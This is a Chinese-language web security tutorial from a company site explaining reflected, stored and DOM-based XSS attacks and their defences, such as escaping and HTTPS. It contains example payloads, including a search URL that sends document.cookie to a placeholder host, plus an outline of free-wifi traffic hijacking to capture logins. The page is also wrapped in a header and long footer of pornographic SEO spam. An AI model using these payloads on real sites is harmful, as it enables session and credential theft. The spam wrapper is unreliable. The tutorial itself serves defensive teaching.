亚洲理论片在线中文字幕_久久久久亚洲精品中文字幕_亚洲中文久久精品无码1_亚洲日本中文字幕天天更新

0834-3229684

前端安全之XSS攻擊

來源:
西昌巧手軟件科技有限公司
作者:
西昌巧手軟件科技有限公司
發布時間:
2017年05月19 14:24
瀏覽:
1829

XSS(cross-site scripting跨域腳本攻擊)攻擊是最常見的Web攻擊,其重點是“跨域”和“客戶端執行”。有人將XSS攻擊分為三種,分別是:

  1. Reflected XSS(基于反射的XSS攻擊)

  2. Stored XSS(基于存儲的XSS攻擊)

  3. DOM-based or local XSS(基于DOM或本地的XSS攻擊)

Reflected XSS

基于反射的XSS攻擊,主要依靠站點服務端返回腳本,在客戶端觸發執行從而發起Web攻擊。

例子:

  1. 做個假設,當亞馬遜在搜索書籍,搜不到書的時候顯示提交的名稱。

  2. 在搜索框搜索內容,填入“<script>alert('handsome boy')</script>”, 點擊搜索。

  3. 當前端頁面沒有對返回的數據進行過濾,直接顯示在頁面上, 這時就會alert那個字符串出來。

  4. 進而可以構造獲取用戶cookies的地址,通過QQ群或者垃圾郵件,來讓其他人點擊這個地址:

http://www.amazon.cn/search?name=<script>document.location='http://xxx/get?cookie='+document.cookie</script>

PS:這個地址當然是沒效的,只是舉例子而已。

結論:

如果只是1、2、3步做成功,那也只是自己折騰自己而已,如果第4步能做成功,才是個像樣的XSS攻擊。

開發安全措施:

  1. 前端在顯示服務端數據時候,不僅是標簽內容需要過濾、轉義,就連屬性值也都可能需要。

  2. 后端接收請求時,驗證請求是否為攻擊請求,攻擊則屏蔽。

例如:

標簽:

<span><script>alert('handsome boy')</script></span>

轉義

<span>&lt;script&gt;alert(&#39;handsome boy&#39;)&lt;/script&gt</span>

屬性:

如果一個input的value屬性值是

瑯琊榜" onclick="javascript:alert('handsome boy')

就可能出現

<input type="text" value="瑯琊榜" onclick="javascript:alert('handsome boy')">

點擊input導致攻擊腳本被執行,解決方式可以對script或者雙引號進行過濾。

Stored XSS

基于存儲的XSS攻擊,是通過發表帶有惡意跨域腳本的帖子/文章,從而把惡意腳本存儲在服務器,每個訪問該帖子/文章的人就會觸發執行。

例子:

  1. 發一篇文章,里面包含了惡意腳本

今天天氣不錯??!<script>alert('handsome boy')</script>
  1. 后端沒有對文章進行過濾,直接保存文章內容到數據庫。

  2. 當其他看這篇文章的時候,包含的惡意腳本就會執行。

出現這種情況。

結論:

后端盡可能對提交數據做過濾,在場景需求而不過濾的情況下,前端就需要做些處理了。

開發安全措施:

  1. 首要是服務端要進行過濾,因為前端的校驗可以被繞過。

  2. 當服務端不校驗時候,前端要以各種方式過濾里面可能的惡意腳本,例如script標簽,將特殊字符轉換成HTML編碼。

DOM-based or local XSS

基于DOM或本地的XSS攻擊。一般是提供一個免費的wifi,但是提供免費wifi的網關會往你訪問的任何頁面插入一段腳本或者是直接返回一個釣魚頁面,從而植入惡意腳本。這種直接存在于頁面,無須經過服務器返回就是基于本地的XSS攻擊。

例子1:

  1. 提供一個免費的wifi。

  2. 開啟一個特殊的DNS服務,將所有域名都解析到我們的電腦上,并把Wifi的DHCP-DNS設置為我們的電腦IP。

  3. 之后連上wifi的用戶打開任何網站,請求都將被我們截取到。我們根據http頭中的host字段來轉發到真正服務器上。

  4. 收到服務器返回的數據之后,我們就可以實現網頁腳本的注入,并返回給用戶。

  5. 當注入的腳本被執行,用戶的瀏覽器將依次預加載各大網站的常用腳本庫。

15.jpg

PS:例子和圖片來自,http://www.cnblogs.com/index-html/p/wifi_hijack_3.html 不是我寫的,請注意!

這個其實就是wifi流量劫持,中間人可以看到用戶的每一個請求,可以在頁面嵌入惡意代碼,使用惡意代碼獲取用戶的信息,可以返回釣魚頁面。

例子2:

  1. 還是提供一個免費wifi

  2. 在我們電腦上進行抓包

  3. 分析數據,可以獲取用戶的微信朋友圈、郵箱、社交網站帳號數據(HTTP)等。

16.jpg

PS:這個是我的測試,在51job頁面登錄時進行抓包,可以獲取帳號密碼。

結論:

這攻擊其實跟網站本身沒有什么關系,只是數據被中間人獲取了而已,而由于HTTP是明文傳輸的,所以是極可能被竊取的。

開發安全措施: 
使用HTTPS!HTTPS會在請求數據之前進行一次握手,使得客戶端與服務端都有一個私鑰,服務端用這個私鑰加密,客戶端用這個私鑰解密,這樣即使數據被人截取了,也是加密后的數據。

總結

XSS攻擊的特點就是:盡一切辦法在目標網站上執行非目標網站上原有的腳本(某篇文章說的)。本地的XSS攻擊的示例2其實不算XSS攻擊,只是簡單流量劫持。前兩種XSS攻擊是我們開發時候要注意的,而流量劫持的則可以使用HTTPS提高安全性。


亚洲理论片在线中文字幕_久久久久亚洲精品中文字幕_亚洲中文久久精品无码1_亚洲日本中文字幕天天更新
  • <strike id="y2ogy"></strike>
    <strike id="y2ogy"><s id="y2ogy"></s></strike>
  • <kbd id="y2ogy"></kbd>
  • 久久综合九色综合欧美就去吻| 一区二区三区精品国产| 欧美国产另类| 久久本道综合色狠狠五月| 亚洲精品乱码久久久久久久久| 国产精品男gay被猛男狂揉视频| 麻豆av一区二区三区| 在线视频你懂得一区二区三区| 韩国三级电影久久久久久| 国产精品99一区| 裸体歌舞表演一区二区 | 欧美国产欧美综合 | 国产毛片精品国产一区二区三区| 欧美夫妇交换俱乐部在线观看| 欧美一区二区私人影院日本 | 欧美黄在线观看| 久久美女性网| 欧美在线免费观看视频| 亚洲永久免费视频| 一区二区欧美亚洲| 亚洲另类在线视频| 亚洲黄色片网站| 国产午夜久久久久| 国产精品永久免费观看| 国产精品播放| 欧美天天影院| 欧美视频成人| 欧美涩涩网站| 国产精品扒开腿做爽爽爽视频| 久热这里只精品99re8久| 久久久久久尹人网香蕉| 久久精品国亚洲| 久久精品99久久香蕉国产色戒| 午夜精品久久久久| 午夜精品99久久免费| 亚洲自拍电影| 一区二区三区国产| 日韩一区二区免费看| 亚洲精品综合| 亚洲精品日韩一| 亚洲免费观看视频| 亚洲美女黄色| 一区二区三区www| 中日韩美女免费视频网址在线观看| 一区二区三区.www| 亚洲一区二区三区乱码aⅴ蜜桃女| 欧美日韩高清免费| 欧美激情乱人伦| 欧美极品欧美精品欧美视频| 国产精品www网站| 国产主播在线一区| 亚洲日韩成人| 亚洲一区精品在线| 久久综合一区| 国产精品超碰97尤物18| 狠狠久久亚洲欧美专区| 日韩视频永久免费观看| 亚洲欧美日韩精品久久奇米色影视| 久久精品亚洲精品国产欧美kt∨| 欧美大成色www永久网站婷| 国产精品每日更新| 亚洲高清在线视频| 亚洲欧美日本在线| 欧美精品激情| 国内久久婷婷综合| 亚洲视频综合在线| 久久综合色综合88| 国产精品日本| 亚洲欧洲日夜超级视频| 欧美一区二区三区婷婷月色| 欧美人牲a欧美精品| 很黄很黄激情成人| 亚洲综合日本| 欧美伦理91i| 在线观看视频亚洲| 性做久久久久久| 欧美区在线观看| 伊人影院久久| 午夜视频一区| 欧美日韩综合久久| 亚洲激情在线观看视频免费| 性久久久久久久久| 欧美日韩一区二区三区免费| 亚洲电影视频在线| 久久精品99无色码中文字幕| 欧美视频二区36p| 亚洲国产精品一区二区www| 久久黄色网页| 国产精品久在线观看| 亚洲精品免费观看| 蜜桃伊人久久| 激情成人亚洲| 久久高清国产| 国产欧美一区在线| 亚洲欧美国产视频| 国产精品av久久久久久麻豆网| 亚洲精品乱码视频| 模特精品裸拍一区| 海角社区69精品视频| 午夜精品久久久久久| 国产精品裸体一区二区三区| 一本色道久久综合亚洲精品小说| 欧美成人精品一区二区| 精品成人久久| 久久久久久久高潮| 国产一区二区主播在线| 亚洲欧美亚洲| 国产精品亚洲片夜色在线| 亚洲调教视频在线观看| 欧美日韩三区| 99日韩精品| 亚洲免费视频在线观看| 欧美日韩国产一区二区| 亚洲日本中文| 欧美激情网友自拍| 亚洲理论在线| 欧美日韩成人在线播放| 亚洲精选成人| 欧美日本高清一区| 99re亚洲国产精品| 欧美日韩亚洲不卡| 在线视频日本亚洲性| 欧美午夜久久| 亚洲一二三级电影| 国产精品视频精品视频| 午夜视频在线观看一区二区三区| 国产精品美女一区二区在线观看| 在线视频亚洲欧美| 国产精品伦一区| 亚洲欧美日韩视频一区| 国产精品影片在线观看| 久久精品视频在线免费观看| 国产亚洲精品久久飘花| 欧美激情在线有限公司| 欧美成人免费网站| 欧美日韩一区二区三区高清| 亚洲欧洲久久| 欧美日韩xxxxx| 宅男噜噜噜66一区二区| 国产精品激情| 欧美三区在线观看| 欧美日韩免费观看一区| 一区二区三区四区五区精品| 国产精品久久久久国产a级| 亚洲综合欧美日韩| 国产精品一二三| 久久精品国产欧美激情| 黄色成人免费观看| 欧美成年人网| 亚洲免费观看在线视频| 欧美性猛交视频| 欧美一区二区三区啪啪| 精品动漫一区| 欧美国产亚洲精品久久久8v| 99视频有精品| 国产欧美精品xxxx另类| 久久一区二区三区av| 91久久久久| 国产精品成人观看视频免费| 亚洲国内精品| 国产精品久久夜| 久久久久久91香蕉国产| 亚洲欧洲一区二区三区在线观看| 欧美日韩国产精品自在自线| 亚洲欧美激情一区二区| 激情小说另类小说亚洲欧美 | 亚洲欧美日本国产专区一区| 国产性猛交xxxx免费看久久| 麻豆精品视频在线| 99视频一区二区| 国产日韩欧美一区| 免费人成精品欧美精品| 亚洲网站视频| 国内精品福利| 欧美绝品在线观看成人午夜影视| 亚洲免费影院| 在线 亚洲欧美在线综合一区| 欧美日韩免费看| 欧美在线观看网址综合| 亚洲日本欧美| 国产精品视频免费| 美女脱光内衣内裤视频久久影院| 一本色道久久88综合亚洲精品ⅰ| 国产精品一区久久| 欧美99在线视频观看| 亚洲先锋成人| 尤物精品在线| 国产精品久久二区二区| 麻豆av福利av久久av| 亚洲一区日韩在线| 亚洲国产精品va在线看黑人动漫| 欧美亚男人的天堂| 免费亚洲电影| 性色av一区二区三区在线观看| 亚洲黄色高清| 国产一区二区高清视频| 欧美全黄视频| 免费在线成人| 午夜欧美不卡精品aaaaa| 亚洲人精品午夜在线观看|